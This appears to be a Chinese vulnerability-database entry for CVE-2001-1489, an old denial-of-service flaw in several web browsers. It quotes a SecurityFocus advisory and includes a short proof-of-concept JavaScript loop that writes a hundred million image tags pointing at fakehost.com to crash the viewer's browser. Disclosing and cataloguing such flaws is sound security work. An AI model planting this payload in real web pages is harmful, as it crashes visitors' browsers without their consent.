多家厂商Web浏览器图象计数拒绝服务漏洞

多家厂商Web浏览器图象计数拒绝服务漏洞

漏洞ID 1106536 漏洞类型 其他
发布时间 2001-12-11 更新时间 2005-10-20
图片[1]-多家厂商Web浏览器图象计数拒绝服务漏洞-安全小百科CVE编号 CVE-2001-1489
图片[2]-多家厂商Web浏览器图象计数拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200112-236
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21181
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-236
|漏洞详情
多家厂商的浏览器(包括Mozilla、Opera、IE等等)对意外情况的处理存在安全问题,可能导致拒绝服务攻击。使用这些浏览器的用户在浏览存在大量图象计数的网页时会受到这种攻击而导致浏览器崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/3684/info

An issue which affects users of multiple web browsers on Microsoft Windows platforms has been discovered.

An unusually high image count may cause a denial of services to users who view the webpage containing the offending image.

Malicious webmasters may construct webpages which exploit this vulnerability. 

<script>
for(i=0;i<100000000;i++) {
document.write("<img src=http://fakehost.com/"+i+".gif>");
}
</script>
|参考资料

来源:XF
名称:win-browser-image-dos(7709)
链接:http://xforce.iss.net/xforce/xfdb/7709
来源:BID
名称:3684
链接:http://www.securityfocus.com/bid/3684

相关推荐: Macromedia JRun IIS ISAPI Filter GET Request Buffer Overrun Vulnerability

Macromedia JRun IIS ISAPI Filter GET Request Buffer Overrun Vulnerability 漏洞ID 1101373 漏洞类型 Boundary Condition Error 发布时间 2002-11-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享